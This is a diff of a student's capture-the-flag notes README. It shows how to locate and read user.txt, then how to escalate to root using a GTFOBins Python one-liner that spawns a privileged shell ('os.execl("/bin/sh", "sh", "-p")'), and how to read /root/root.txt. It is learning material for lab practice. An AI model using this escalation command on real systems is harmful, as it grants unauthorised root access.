Izumi0XD/CYBER_SECURITY_NOTES/DAY_10/README.md

 ### • 8.
 Now to find our desired file we have to rrun a find command like

     find / -type f -name user.txt 2> /dev/null
+ or

+    find / -type f -name user.txt

    now we just have to cat the result

      cat /var/www/user.txt

 ### • 9.
 Privilege Esclation

-   to gain root acess we have to run a privilege esclation command to find th ecode we gtg at GFTOBins [website](https://gtfobins.github.io/)
+   To gain root acess we have to run a privilege esclation command to find th ecode we gtg at GFTOBins [Website](https://gtfobins.github.io/), and run the given command

+        python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

+Now we are root user to confirm tht ewe have to use ***whoami*** command now to find the root.txt file we simply have to use

+    find / -type f -name root.txt
+    cat /root/root.txt